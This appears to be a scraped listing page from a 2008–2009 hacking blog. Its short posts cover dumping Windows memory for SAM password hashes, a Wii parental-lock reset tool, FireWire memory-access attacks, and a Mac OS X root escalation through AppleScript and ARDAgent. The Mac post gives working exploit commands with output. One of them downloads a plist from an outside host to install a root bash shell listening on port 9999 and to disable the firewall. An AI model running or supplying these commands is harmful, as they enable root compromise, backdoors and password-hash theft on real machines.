TrackSomebody.com

october27thgroup.com pentesting, pci, red team

illmob.org

Dumping Physical Memory to extract SAM Hashes

March 21st, 2009 by admin in Password Info, Privilege Escalation, windows

Tools Needed : MDD pyCrypto Volatility 1.3 Beta Volatility Plugin from Moyix ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server. After downloading MDD from the Mantech site you need to run (more…)

Wii Parental Control Password Reset Tool

October 17th, 2008 by admin in Gaming, Password Info

This should be of use for those who bought second-hand Wiis that were parental-locked. Marcan wrote a quick little tool to generate Parental Control password reset codes without having to call Nintendo. Bushing found the code inside the system menu, and Marcan converted it into a PSP script (Python Server Pages) which you can use on-line.
Go into the Parental controls itself, then Click “I forgot on the Pin” entry page, and “I forgot on the Secret Answer” entry page. Your 8 digit confirmation code will be on the next page. Enter that code into the box here http://wii.marcansoft.com/parental.psp and it will spit back the code to unlock it.

Winlockpwn – Access through firewire

June 22nd, 2008 by Dev Team in Password Info, windows

From Pauldotcom:

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire’s direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right? (more…)

Mac OS X Root Escalation Through AppleScript [Local]

June 15th, 2008 by admin in Apple, News, Uncategorized

Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through
AppleScript:
osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘;

I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “touch /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “rm /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999’ and find yourself at a root shell.

To remove, run ‘launchctl unload com.apple.bash’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.